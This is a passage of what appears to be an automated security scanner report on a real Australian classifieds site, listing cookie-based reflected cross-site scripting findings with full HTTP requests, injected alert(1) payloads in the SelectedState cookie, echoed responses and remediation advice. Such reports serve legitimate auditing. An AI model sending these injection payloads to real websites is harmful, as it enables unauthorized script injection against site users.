Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
encodeURIComponent(link);
window.open(vUrl ,'PopUp','width=900, height=600,left=200,top=150,toolbar=no, scrollbars=no');
return false;
}
var navBarCat = 'CommunityPage';

var backupState = 'NotSelectedccc2f'-alert(1)-'f96e976d728';

</script>
...[SNIP]...

2.766. http://www.tradingpost.com.au/DIY-Home-Renovations/Browse [SelectedState cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradingpost.com.au
Path:   /DIY-Home-Renovations/Browse

Issue detail

The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64f69'-alert(1)-'2b92f2ebc42 was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /DIY-Home-Renovations/Browse HTTP/1.1
Host: www.tradingpost.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelected64f69'-alert(1)-'2b92f2ebc42;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:42:31 GMT
Server: Apache/2.0.59 (Unix)
Content-Length: 130298
Set-Cookie: sid=74dC7YDZ8QZBZcwyxZBITIv7RRGbisdrHD5ODFIK; path=/
Set-Cookie: pgid=C8ZKCzmK29BSR04xyLHmd28q0000w7NEgzy_; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: SelectedState=NotSelected64f69'-alert(1)-'2b92f2ebc42; Expires=Thu, 23-Dec-2010 02:42:31 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED64F69'-ALERT(1)-'2B92F2EBC42; Expires=Thu, 23-Dec-2010 02:42:32 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED64F69'-ALERT(1)-'2B92F2EBC42; Expires=Thu, 23-Dec-2010 02:42:32 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED64F69'-ALERT(1)-'2B92F2EBC42; Expires=Thu, 23-Dec-2010 02:42:32 GMT; Path=/
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
'?Link=' + encodeURIComponent(link);
window.open(vUrl ,'PopUp','width=900, height=600,left=200,top=150,toolbar=no, scrollbars=no');
return false;
}
var navBarCat = 'X5';

var backupState = 'NOTSELECTED64F69'-ALERT(1)-'2B92F2EBC42';

</script>
...[SNIP]...

2.767. http://www.tradingpost.com.au/Garden-Outdoor-Living/Browse [SelectedState cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradingpost.com.au
Path:   /Garden-Outdoor-Living/Browse

Issue detail

The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f3b9'-alert(1)-'33da9a4768a was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Garden-Outdoor-Living/Browse HTTP/1.1
Host: www.tradingpost.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelected2f3b9'-alert(1)-'33da9a4768a;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:42:30 GMT
Server: Apache/2.0.59 (Unix)
Content-Length: 130366
Set-Cookie: sid=NnaezYCQVwOaBMx7HGCUbIuyccRtdCoG7xFusPfF; path=/
Set-Cookie: pgid=C8ZKCzmK29BSR04xyLHmd28q00005H3CC4EN; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: SelectedState=NotSelected2f3b9'-alert(1)-'33da9a4768a; Expires=Thu, 23-Dec-2010 02:42:30 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED2F3B9'-ALERT(1)-'33DA9A4768A; Expires=Thu, 23-Dec-2010 02:42:30 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED2F3B9'-ALERT(1)-'33DA9A4768A; Expires=Thu, 23-Dec-2010 02:42:30 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED2F3B9'-ALERT(1)-'33DA9A4768A; Expires=Thu, 23-Dec-2010 02:42:30 GMT; Path=/
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
'?Link=' + encodeURIComponent(link);
window.open(vUrl ,'PopUp','width=900, height=600,left=200,top=150,toolbar=no, scrollbars=no');
return false;
}
var navBarCat = 'X3';

var backupState = 'NOTSELECTED2F3B9'-ALERT(1)-'33DA9A4768A';

</script>
...[SNIP]...

2.768. http://www.tradingpost.com.au/Home [SelectedState cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradingpost.com.au
Path:   /Home

Issue detail

The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad994'%3balert(1)//a5b98d3ac20 was submitted in the SelectedState cookie. This input was echoed as ad994';alert(1)//a5b98d3ac20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Home HTTP/1.1
Host: www.tradingpost.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelectedad994'%3balert(1)//a5b98d3ac20;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:40:15 GMT
Server: Apache/2.0.59 (Unix)
Content-Length: 135258
Set-Cookie: sid=5_v8Mxu7F9YXMFdQznTaOLqxuyVVvbEtPpyJ6VW4; path=/
Set-Cookie: pgid=C8ZKCzmK29BSR04xyLHmd28q0000TpPzZdRN; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: SelectedState=NotSelectedad994'%3balert(1)//a5b98d3ac20; Expires=Thu, 23-Dec-2010 02:40:15 GMT; Path=/
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
+ '?Link=' + encodeURIComponent(link);
window.open(vUrl ,'PopUp','width=900, height=600,left=200,top=150,toolbar=no, scrollbars=no');
return false;
}
var navBarCat = '';

var backupState = 'NotSelectedad994';alert(1)//a5b98d3ac20';

</script>
...[SNIP]...

2.769. http://www.tradingpost.com.au/Pets-Horses/Browse [SelectedState cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradingpost.com.au
Path:   /Pets-Horses/Browse

Issue detail

The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1971'-alert(1)-'57dd562bec7 was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Pets-Horses/Browse HTTP/1.1
Host: www.tradingpost.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelectedf1971'-alert(1)-'57dd562bec7;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:42:28 GMT
Server: Apache/2.0.59 (Unix)
Content-Length: 128282
Set-Cookie: sid=7TAQgEb5txt4gQoSxyQ2i-fzse65DuxvNFdokB-p; path=/
Set-Cookie: pgid=C8ZKCzmK29BSR04xyLHmd28q0000PT9P0_ZC; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: SelectedState=NotSelectedf1971'-alert(1)-'57dd562bec7; Expires=Thu, 23-Dec-2010 02:42:28 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTEDF1971'-ALERT(1)-'57DD562BEC7; Expires=Thu, 23-Dec-2010 02:42:28 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTEDF1971'-ALERT(1)-'57DD562BEC7; Expires=Thu, 23-Dec-2010 02:42:28 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTEDF1971'-ALERT(1)-'57DD562BEC7; Expires=Thu, 23-Dec-2010 02:42:28 GMT; Path=/
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
'?Link=' + encodeURIComponent(link);
window.open(vUrl ,'PopUp','width=900, height=600,left=200,top=150,toolbar=no, scrollbars=no');
return false;
}
var navBarCat = 'X6';

var backupState = 'NOTSELECTEDF1971'-ALERT(1)-'57DD562BEC7';

</script>
...[SNIP]...

2.770. http://www.tradingpost.com.au/Real-Estate/Browse [SelectedState cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradingpost.com.au
Path:   /Real-Estate/Browse

Issue detail

The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d94d'-alert(1)-'5528de391ec was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Real-Estate/Browse HTTP/1.1
Host: www.tradingpost.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelected2d94d'-alert(1)-'5528de391ec;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:42:32 GMT
Server: Apache/2.0.59 (Unix)
Content-Length: 122740
Set-Cookie: sid=yvrn5HpV0v6L4Ta-4OLB79tfliROaiaLY3RUGa3_; path=/
Set-Cookie: pgid=C8ZKCzmK29BSR04xyLHmd28q0000_krp0toH; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: SelectedState=NotSelected2d94d'-alert(1)-'5528de391ec; Expires=Thu, 23-Dec-2010 02:42:32 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED2D94D'-ALERT(1)-'5528DE391EC; Expires=Thu, 23-Dec-2010 02:42:32 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED2D94D'-ALERT(1)-'5528DE391EC; Expires=Thu, 23-Dec-2010 02:42:32 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED2D94D'-ALERT(1)-'5528DE391EC; Expires=Thu, 23-Dec-2010 02:42:32 GMT; Path=/
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
?Link=' + encodeURIComponent(link);
window.open(vUrl ,'PopUp','width=900, height=600,left=200,top=150,toolbar=no, scrollbars=no');
return false;
}
var navBarCat = 'X12';

var backupState = 'NOTSELECTED2D94D'-ALERT(1)-'5528DE391EC';

</script>
...[SNIP]...

2.771. http://www.tradingpost.com.au/Rural-Machinery/Browse [SelectedState cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradingpost.com.au
Path:   /Rural-Machinery/Browse

Issue detail

The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4291e'-alert(1)-'4552d9ada7 was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Rural-Machinery/Browse HTTP/1.1
Host: www.tradingpost.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelected4291e'-alert(1)-'4552d9ada7;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:43:03 GMT
Server: Apache/2.0.59 (Unix)
Content-Length: 128722
Set-Cookie: sid=zjf7eFqIXhRXfRZj5ADec_uCZKEiHx06PY5gBply; path=/
Set-Cookie: pgid=C8ZKCzmK29BSR04xyLHmd28q0000-3G3GJZx; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: SelectedState=NotSelected4291e'-alert(1)-'4552d9ada7; Expires=Thu, 23-Dec-2010 02:43:03 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED4291E'-ALERT(1)-'4552D9ADA7; Expires=Thu, 23-Dec-2010 02:43:03 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED4291E'-ALERT(1)-'4552D9ADA7; Expires=Thu, 23-Dec-2010 02:43:03 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED4291E'-ALERT(1)-'4552D9ADA7; Expires=Thu, 23-Dec-2010 02:43:03 GMT; Path=/
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
'?Link=' + encodeURIComponent(link);
window.open(vUrl ,'PopUp','width=900, height=600,left=200,top=150,toolbar=no, scrollbars=no');
return false;
}
var navBarCat = 'X8';

var backupState = 'NOTSELECTED4291E'-ALERT(1)-'4552D9ADA7';

</script>
...[SNIP]...

2.772. http://www.tradingpost.com.au/Sell [SelectedState cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradingpost.com.au
Path:   /Sell

Issue detail

The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload caee7'%3balert(1)//c20cb122a55 was submitted in the SelectedState cookie. This input was echoed as caee7';alert(1)//c20cb122a55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Sell HTTP/1.1
Host: www.tradingpost.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelectedcaee7'%3balert(1)//c20cb122a55;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:41:34 GMT
Server: Apache/2.0.59 (Unix)
Content-Length: 84692
Set-Cookie: sid=nQui-O2Xl-KjFqF8tNWoWea22rlRQaolbrJxVagg; path=/
Set-Cookie: pgid=C8ZKCzmK29BSR04xyLHmd28q0000AE3m5wDt; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: SelectedState=NotSelectedcaee7'%3balert(1)//c20cb122a55; Expires=Thu, 23-Dec-2010 02:41:34 GMT; Path=/
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
+ '?Link=' + encodeURIComponent(link);
window.open(vUrl ,'PopUp','width=900, height=600,left=200,top=150,toolbar=no, scrollbars=no');
return false;
}
var navBarCat = '';

var backupState = 'NotSelectedcaee7';alert(1)//c20cb122a55';

</script>
...[SNIP]...

2.773. http://www.tradingpost.com.au/Sell-Car/LandingPage [SelectedState cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradingpost.com.au
Path:   /Sell-Car/LandingPage

Issue detail

The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2cb6'-alert(1)-'0fe791e9775 was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Sell-Car/LandingPage HTTP/1.1
Host: www.tradingpost.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelectedc2cb6'-alert(1)-'0fe791e9775;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:43:59 GMT
Server: Apache/2.0.59 (Unix)
Content-Length: 93024
Set-Cookie: sid=iKdQgHSE3YcNhThvosh1i9WO1Hn5DihaISmRFRlM; path=/
Set-Cookie: pgid=C8ZKCzmK29BSR04xyLHmd28q0000qH6EpNuS; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: SelectedState=NotSelectedc2cb6'-alert(1)-'0fe791e9775; Expires=Thu, 23-Dec-2010 02:43:59 GMT; Path=/
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
=' + encodeURIComponent(link);
window.open(vUrl ,'PopUp','width=900, height=600,left=200,top=150,toolbar=no, scrollbars=no');
return false;
}
var navBarCat = 'Sell-Car';

var backupState = 'NotSelectedc2cb6'-alert(1)-'0fe791e9775';

</script>
...[SNIP]...

2.774. http://www.tradingpost.com.au/Sport-Leisure-Travel/Browse [SelectedState cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradingpost.com.au
Path:   /Sport-Leisure-Travel/Browse

Issue detail

The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89afa'-alert(1)-'c61ef295c08 was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Sport-Leisure-Travel/Browse HTTP/1.1
Host: www.tradingpost.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelected89afa'-alert(1)-'c61ef295c08;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:43:08 GMT
Server: Apache/2.0.59 (Unix)
Content-Length: 130740
Set-Cookie: sid=PimAUCBdNACDkWy2FBWK8St8eZtz6WfvzZBBxU2V; path=/
Set-Cookie: pgid=C8ZKCzmK29BSR04xyLHmd28q0000ftT2cHnP; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: SelectedState=NotSelected89afa'-alert(1)-'c61ef295c08; Expires=Thu, 23-Dec-2010 02:43:08 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED89AFA'-ALERT(1)-'C61EF295C08; Expires=Thu, 23-Dec-2010 02:43:08 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED89AFA'-ALERT(1)-'C61EF295C08; Expires=Thu, 23-Dec-2010 02:43:08 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED89AFA'-ALERT(1)-'C61EF295C08; Expires=Thu, 23-Dec-2010 02:43:08 GMT; Path=/
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
?Link=' + encodeURIComponent(link);
window.open(vUrl ,'PopUp','width=900, height=600,left=200,top=150,toolbar=no, scrollbars=no');
return false;
}
var navBarCat = 'X13';

var backupState = 'NOTSELECTED89AFA'-ALERT(1)-'C61EF295C08';

</script>
...[SNIP]...

2.775. http://www.tradingpost.com.au/TrustAndSafety/LandingPage [SelectedState cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradingpost.com.au
Path:   /TrustAndSafety/LandingPage

Issue detail

The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4419c'-alert(1)-'491d27d702a was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TrustAndSafety/LandingPage HTTP/1.1
Host: www.tradingpost.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelected4419c'-alert(1)-'491d27d702a;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:42:55 GMT
Server: Apache/2.0.59 (Unix)
Content-Length: 107207
Set-Cookie: sid=UJ7VaAw5TuLRb0DSerHfyQcbDEB85r3D086jMuUd; path=/
Set-Cookie: pgid=C8ZKCzmK29BSR04xyLHmd28q0000FUAq9J0Y; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: SelectedState=NotSelected4419c'-alert(1)-'491d27d702a; Expires=Thu, 23-Dec-2010 02:42:55 GMT; Path=/
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
ncodeURIComponent(link);
window.open(vUrl ,'PopUp','width=900, height=600,left=200,top=150,toolbar=no, scrollbars=no');
return false;
}
var navBarCat = 'TrustAndSafety';

var backupState = 'NotSelected4419c'-alert(1)-'491d27d702a';

</script>
...[SNIP]...

2.776. https://www.tradingpost.com.au/Sell [SelectedState cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tradingpost.com.au
Path:   /Sell

Issue detail

The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dca22'%3balert(1)//2700ad3c8c4 was submitted in the SelectedState cookie. This input was echoed as dca22';alert(1)//2700ad3c8c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Sell HTTP/1.1
Host: www.tradingpost.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelecteddca22'%3balert(1)//2700ad3c8c4;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:45:09 GMT
Server: Apache/2.0.59 (Unix)
Content-Length: 84696
Set-Cookie: sid=IQ-5l1H1My_Ckx0eC7qcnPD_fdEQGQ0riIG1doMm; path=/
Set-Cookie: pgid=C8ZKCzmK29BSR04xyLHmd28q0000Wg6aDTal; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: SelectedState=NotSelecteddca22'%3balert(1)//2700ad3c8c4; Expires=Thu, 23-Dec-2010 02:45:09 GMT; Path=/
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html;charset=utf-8
Set-Cookie: TPG_CAC=621519114.20736.0000; path=/


